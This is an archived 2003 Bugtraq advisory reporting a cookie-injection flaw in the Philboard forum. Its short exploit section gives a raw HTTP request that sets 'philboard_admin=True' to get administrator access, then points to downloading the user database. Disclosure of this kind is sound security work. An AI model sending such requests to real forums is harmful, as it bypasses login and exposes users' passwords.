Home page logo

bugtraq logo Bugtraq mailing list archives

Philboard Forum Vulnerability
From: aresu () bosen net
Date: Thu, 29 May 2003 15:48:45 +0700

Philboard Vulnerability

Severity : High (Possible gain administrator/users access on Forum Board)
Systems Affected: Philboard up to v1.14
Vendor URL: http://www.youngpip.com/philboard.asp
Vuln Type : Cookie Injection
Status    : Vendor contacted, fixed version is not available (cause they didn't 
Author    : AresU
Greetz to : Bosen, Tioeuy, syzwz, Heltz, eF73, SakitJiwa, gembule, muthafuka, 
and All 1ndonesian Security Team (1st)
#romance () centrin net id

Philboard is freeware forum application under ASP Scripts.
Vulnerable script is on cookie management, all most script is vulnerable for 
cookie injection. The cookies are "philboard_admin=True;" or "admin=True;"

Vulnerability discovery and advisory by AresU

Vendor Response
Vendor has contacted and fixed version is not available (cause they didn't 
To Fix the script, you must change every cookie command in to session command.

Exploit Code
1) Login Administrator Forum:
Use your telnet and open target on port 80

GET /board/philboard_admin.asp HTTP/1.0
Host: target.com
Cookie: philboard_admin=True;

2) Download the database (users and password):
Usually, the database location can be found and download it from:

This mail sent through http://webmail.bosen.net

  By Date           By Thread  

Current thread:
  • Philboard Forum Vulnerability aresu (May 30)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]